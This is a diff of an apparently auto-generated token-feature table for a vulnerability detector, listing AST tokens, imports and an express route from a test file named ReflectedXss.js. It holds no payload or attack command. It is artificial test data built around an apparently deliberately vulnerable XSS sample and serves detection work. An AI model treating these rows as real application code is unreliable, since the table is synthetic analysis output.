autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:17 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:36 | exceptional return of require ... ument') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:36 | exceptional return of require ... ument') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:36 | exceptional return of require ... ument') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:36 | require ... ument') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:36 | require ... ument') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:11:48:36 | require ... ument') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:19:48:35 | 'rehype-document' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:19:48:35 | 'rehype-document' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:19:48:35 | 'rehype-document' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:19:48:35 | 'rehype-document' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:19:48:35 | 'rehype-document' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:48:19:48:35 | 'rehype-document' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:10 | format | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:10 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:10 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:10 | format | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:37 | format | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:37 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:37 | format | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:37 | format ... ormat') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:37 | format ... ormat') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:5:49:37 | format ... ormat') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:20 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:20 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:37 | exceptional return of require ... ormat') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:37 | exceptional return of require ... ormat') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:37 | exceptional return of require ... ormat') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:37 | require ... ormat') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:37 | require ... ormat') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:14:49:37 | require ... ormat') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:22:49:36 | 'rehype-format' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:22:49:36 | 'rehype-format' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:22:49:36 | 'rehype-format' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:22:49:36 | 'rehype-format' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:22:49:36 | 'rehype-format' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:49:22:49:36 | 'rehype-format' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:8 | html | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:8 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:8 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:8 | html | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:38 | html | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:38 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:38 | html | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:38 | html = ... ngify') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:38 | html = ... ngify') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:5:50:38 | html = ... ngify') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:18 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:18 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:38 | exceptional return of require ... ngify') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:38 | exceptional return of require ... ngify') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:38 | exceptional return of require ... ngify') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:38 | require ... ngify') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:38 | require ... ngify') | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:12:50:38 | require ... ngify') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | @@ -19782,24 +133028,104 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:20:50:37 | 'rehype-stringify' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:20:50:37 | 'rehype-stringify' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:50:20:50:37 | 'rehype-stringify' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:10 | remark | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:10 | remark | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:10 | remark | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:10 | remark | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:30 | remark | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:30 | remark | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:30 | remark | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:30 | remark ... emark") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:30 | remark ... emark") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:5:51:30 | remark ... emark") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:20 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:20 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:30 | exceptional return of require("remark") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:30 | exceptional return of require("remark") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:30 | exceptional return of require("remark") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:30 | require("remark") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:30 | require("remark") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:14:51:30 | require("remark") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:22:51:29 | "remark" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:22:51:29 | "remark" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:22:51:29 | "remark" | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:22:51:29 | "remark" | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:22:51:29 | "remark" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:51:22:51:29 | "remark" | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:12 | sanitize | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:12 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:12 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:12 | sanitize | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:41 | sanitiz ... itize") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:41 | sanitiz ... itize") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:41 | sanitiz ... itize") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:41 | sanitize | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:41 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:5:52:41 | sanitize | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:22 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:22 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:41 | exceptional return of require ... itize") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:41 | exceptional return of require ... itize") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:41 | exceptional return of require ... itize") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:41 | require ... itize") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:41 | require ... itize") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:16:52:41 | require ... itize") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:24:52:40 | "rehype-sanitize" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:24:52:40 | "rehype-sanitize" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:24:52:40 | "rehype-sanitize" | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:24:52:40 | "rehype-sanitize" | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:24:52:40 | "rehype-sanitize" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:52:24:52:40 | "rehype-sanitize" | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:7:53:25 | { resetExtensions } | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:7:53:25 | { resetExtensions } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:7:53:25 | { resetExtensions } | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:7:53:47 | { reset ... wdown') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:7:53:47 | { reset ... wdown') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:7:53:47 | { reset ... wdown') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:9:53:23 | resetExtensions | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:35 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:35 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:35 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:47 | exceptional return of require('showdown') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:47 | exceptional return of require('showdown') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:47 | exceptional return of require('showdown') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:47 | require('showdown') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:47 | require('showdown') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:29:53:47 | require('showdown') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:37:53:46 | 'showdown' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:37:53:46 | 'showdown' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:37:53:46 | 'showdown' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:37:53:46 | 'showdown' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:37:53:46 | 'showdown' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:53:37:53:46 | 'showdown' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:55:3 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:55:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:55:3 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:55:7 | app.get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:55:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:55:7 | app.get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:77:2 | app.get ... })\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:77:2 | app.get ... })\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:77:2 | app.get ... })\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:77:2 | exceptional return of app.get ... })\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:77:2 | exceptional return of app.get ... })\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:1:77:2 | exceptional return of app.get ... })\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:5:55:7 | get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:5:55:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:5:55:7 | get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:9:55:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:9:55:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:9:55:19 | '/user/:id' | calleeImports | express | @@ -19807,6 +133133,66 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:9:55:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:9:55:19 | '/user/:id' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:55:9:55:19 | '/user/:id' | receiverName | app | +| 